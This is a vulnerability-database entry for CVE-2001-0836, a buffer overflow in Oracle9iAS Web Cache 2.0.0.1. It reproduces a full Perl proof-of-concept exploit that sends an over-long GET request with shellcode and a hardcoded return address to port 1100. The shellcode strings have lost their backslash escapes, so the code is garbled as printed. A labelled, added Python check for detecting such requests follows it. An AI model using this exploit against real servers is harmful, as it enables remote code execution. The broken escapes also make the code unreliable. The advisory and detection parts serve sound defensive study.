Oracle9iAS Web Cache Code Execution Vulnerability

Vulnerability ID: 1106505
Vulnerability type: Buffer overflow
Published: 2001-10-18
Updated: 2005-05-02
CVE ID: CVE-2001-0836
CNNVD-ID: CNNVD-200112-071
Platform: Windows
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-071
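|Vulnerability details
A buffer overflow vulnerability exists in Oracle9iAS Web Cache 2.0.0.1. A remote attacker can execute arbitrary code by means of an overly long HTTP GET request.
|Exploit (EXP)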
source: http://www.securityfocus.com/bid/3443/info

A buffer overflow condition can be triggered in Oracle 9iAS Web Cache 2.0.0.1.0 by submitting a malicious URL. This overflow can lead to either the process exiting, the process hanging, or the injection of malicious code. This occurs on all four services provided by Web Cache.

While this vulnerability has been addressed in Oracle 9iAS Web Cache 2.0.0.2.0, it has been reported that versions for Microsoft Windows NT are still vulnerable.

#!perl
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By [email protected] (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>\n";
        print "Example: $0 127.0.0.1\n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "xebx03x5axebx05xe8xf8xffxffxffx8bxecx8bxc2x83xc0x18x33xc9";
$sploit=$sploit . "x66xb9xb3x80x66x81xf1x80x80x80x30x99x40xe2xfaxaax59";
$sploit=$sploit . "xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1ax5bxa4";
$sploit=$sploit . "xcbx27x51x99xd5x99x66x8fxaax59xc9x27x09x98xd5x99x66";
$sploit=$sploit . "x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";
$msg = "GET " . $sploit . "x90" x (3096 - length($sploit)) . "xe8xf1xc5x05" . " HTTP/1.0nn";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
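
A defender-side check for the condition described above (an over-long HTTP GET request line carrying raw binary in the URL), as an added example that is not part of the original advisory or exploit listing. The function name, thresholds and sample requests are assumptions constructed for illustration.

```python
import re

# Assumed policy values for this example (not taken from the advisory).
MAX_REQUEST_LINE = 2048   # bytes allowed in "METHOD target VERSION"
MAX_REPEAT_RUN = 64       # longest tolerated run of one repeated byte

# Matches one byte followed by at least MAX_REPEAT_RUN copies of itself.
REPEAT_RUN = re.compile(rb"(.)\1{%d,}" % MAX_REPEAT_RUN, re.DOTALL)
# A request target must be visible ASCII; raw bytes have to be percent-encoded.
NON_URI_BYTE = re.compile(rb"[^\x21-\x7e]")
HTTP_VERSION = re.compile(rb" HTTP/\d\.\d$")


def inspect_request(raw: bytes) -> list:
    """Return the reasons a raw HTTP request looks like an overflow attempt."""
    findings = []
    # The request line ends at the first LF; accept bare LF as well as CRLF.
    line = raw.partition(b"\n")[0].rstrip(b"\r")
    if len(line) > MAX_REQUEST_LINE:
        findings.append("request-line-too-long")
    # Binary payloads may contain spaces, so do not split on every space:
    # take the method up to the first space and strip a trailing version.
    _method, _, rest = line.partition(b" ")
    target = HTTP_VERSION.sub(b"", rest)
    if NON_URI_BYTE.search(target):
        findings.append("non-ascii-bytes-in-target")
    if REPEAT_RUN.search(target):
        findings.append("repeated-byte-run")
    return findings


# Constructed sample requests (filler bytes only, no payload).
BENIGN = b"GET /index.html HTTP/1.0\r\n\r\n"
OVERSIZED = b"GET " + b"\x90" * 3096 + b" HTTP/1.0\n\n"
RAW_BYTE = b"GET /caf\xe9 HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("oversized", OVERSIZED),
                      ("raw-byte", RAW_BYTE)):
        print(name, inspect_request(req))
```

The same three conditions can be enforced at a reverse proxy or expressed as an IDS rule in front of a Web Cache listener that cannot be upgraded.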
|References

Source: US-CERT Vulnerability Note: VU#649979
Name: VU#649979
Link: http://www.kb.cert.org/vuls/id/649979
Source: CERT/CC Advisory: CA-2001-29
Name: CA-2001-29
Link: http://www.cert.org/advisories/CA-2001-29.html
Source: BUGTRAQ
Name: 20011024 Oracle9iAS Web Cache Overflow Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=100395487007578&w=2
Source: BUGTRAQ
Name: 20011018 def-2001-30
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=100342151132277&w=2
Source: otn.oracle.com
Link: http://otn.oracle.com/deploy/security/pdf/webcache.pdf
Source: XF
Name: oracle-appserver-http-bo(7306)
Link: http://xforce.iss.net/static/7306.php
Source: OSVDB
Name: 5534
Link: http://www.osvdb.org/5534
